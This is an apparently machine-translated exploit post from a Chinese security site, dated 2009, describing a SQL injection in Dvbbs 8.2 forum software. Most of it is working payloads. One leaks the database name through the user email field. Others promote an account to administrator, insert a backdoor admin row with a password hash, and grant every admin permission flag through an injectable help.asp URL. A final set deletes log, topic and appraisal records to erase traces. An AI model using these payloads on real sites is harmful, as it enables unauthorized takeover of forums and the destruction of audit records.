Dvbbs 8.2 SQL injection 0day-vulnerability warning-the black bar safety net

ID MYHACK58:62200925772
Type myhack58
Reporter 佚名
Modified 2009-12-31T00:00:00


This vulnerability was first in the old General forum to see now online are published, the vulnerability is who found the I forget

Use: Posting, the title for the following sql statement, and then comments. 0 for neutral, 1 for support, 2 for the opposition. At this time sql statement is executed The name of the library: a’,’,1,’akai’,’2008-2-4’,’,2);update//dv_user//set//useremail=db_name()//where//username=’akai’-- Copy the code plus the front and back office Administrator: a’,’,1,’akai’,’2008-2-4’,’,2);update dv_user set UserGroupID=1 where username=’akai’;insert into dv_admin(Username,Password,Flag,Adduser)values(’akai’,’965eb72c92a549dd’,’,4,’,’akai’)-- Copy the code into the background,by injecting and then get all the permissions: http://www.xxx.com/Admin/help.asp?action=view&id=1;update//dv_admin//set//flag=’1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45’//where//username=’akai’-- Copy the code to clean up the database record with three tables: the http://www.xxx.com/Admin/help.asp?action=view&id=1;delete//from//dv_log//where//l_username=’akai’;delete//from//dv_topic//where//PostUsername=’akai’;delete//from//Dv_Appraise//where//UserName=’akai’-- Copy the code(because it is through the back injection to perform a delete statement, so the last Dv_log or is there an article on the background to help. asp file access recording) Also in the test stage, a large cattle make do with